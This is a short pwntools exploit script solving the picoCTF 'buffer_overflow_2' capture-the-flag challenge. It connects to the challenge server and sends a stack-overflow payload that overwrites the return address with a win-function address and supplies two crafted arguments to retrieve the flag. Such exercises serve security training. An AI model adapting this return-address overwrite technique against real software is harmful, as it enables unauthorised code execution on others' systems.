picoCTF/buffer_overflow_2/sol.py

#!/usr/bin/env python
from pwn import *
context.terminal = "kitty"

win_address = 0x08049296

buffer_base = 0xfffe422c
ret_location = 0xfffe429c
ret_offset = ret_location - buffer_base

ebp_offset = 112
arg1 = 0xCAFEF00D
arg2 = 0xF00DF00D

conn = remote("saturn.picoctf.net", 56706)
#conn = process("./vuln")
#attach(conn)

conn.recvline()
conn.writeline(flat({ebp_offset+0x8:arg1, ebp_offset+0xc:arg2, ret_offset:win_address}, word_size=32))
conn.recvline()
rest = conn.recvuntil(b'}')
log.info(f"got {rest}")